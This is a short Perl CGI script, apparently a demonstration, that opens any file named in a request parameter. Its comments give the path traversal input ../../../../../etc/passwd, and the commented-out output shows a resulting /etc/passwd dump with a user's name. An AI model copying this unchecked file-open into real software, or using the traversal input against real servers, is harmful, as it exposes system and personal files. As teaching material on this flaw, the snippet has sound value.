usr local bin perl -w use CGI use strict my new CGI my q- Vars local u

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
#!/usr/local/bin/perl -w
use CGI;
use strict;
my $q = new CGI;
my $p = $q->Vars;
local $/ = undef;
my $file = $p->{file}; # ?file=doc1.txt <-- Должно
open F, $file or die $!; # ../../../../../etc/passwd <-- Хек
my $data = <F>;
close F;
print $q->header,
$q->start_html,
$q->h1($data),
$q->end_html;
#.......................
#<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
#</head>
#<body>
#<h1>root:x:0:0:root:/root:/bin/bash
#bin:x:1:1:bin:/bin:/bin/false
#daemon:x:2:2:daemon:/sbin:/bin/false
#mail:x:8:12:mail:/var/spool/mail:/bin/false
#ftp:x:14:11:ftp:/srv/ftp:/bin/false
#http:x:33:33:http:/srv/http:/bin/false
#nobody:x:99:99:nobody:/:/bin/false
#dbus:x:81:81:System message bus:/:/bin/false
#policykit:x:102:101:PolicyKit:/:/sbin/nologin
#hal:x:82:82:HAL daemon:/:/bin/false
#ryuk:x:1000:100:Dima,Rubalko,,:/home/ryuk:/bin/zsh
#avahi:x:84:84:Avahi daemon:/:/bin/false
#</h1>
#</body>
#</html>%
#[~/src/perl/test]-»
#23:28